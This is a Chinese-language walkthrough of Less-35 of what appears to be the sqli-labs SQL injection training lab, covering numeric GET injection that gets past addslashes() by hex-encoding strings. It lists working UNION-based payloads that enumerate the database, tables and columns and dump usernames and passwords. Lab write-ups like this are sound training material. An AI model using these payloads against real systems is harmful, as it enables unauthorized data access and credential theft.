Less-35
GET-绕过添加斜杠(我们不需要它们)基于整数
基于错误_GET_数字型_addslashes()_宽字节注入
0x01. 判断注入类型
这关有错误回显,所以比较容易判断:
由此得出结论该注入类型为数字型。
小提示:
如何判断数字型or被过滤
而没有错误回显时,我们又应该怎么判断是数字型注入还是引号被过滤呢?
在能分辨出正确回显和错误回显(有固定字符串)时,
id=1
正确回显,尝试id=1'
和id=1"
:
- 若两者都正确回显:很可能是被过滤引号
- 若两者都错误回显:很可能是数字型查询
- 若一正确一错误:基本可确定是字符型查询
我们知道了数字型并且知道使用了addslashes()函数,那么数字型通关其实就很简单了,操作和Less-2几乎一样,只不过有一点的小改动,就是注入语句出现的引号里面的数据转为16进制即可,具体如下:
暴库
?id=-1 union select 1,2,database()--+
暴表
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+
切记:security 转为16进制为0x7365637572697479 是不包括引号的,转为16进制也不需要引号
暴字段
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273 and table_schema=0x7365637572697479--+
暴数据
?id=-1 union select 1,group_concat(username,0x7e,password),3 from security.users --+
我们还可以看下核心源码:
完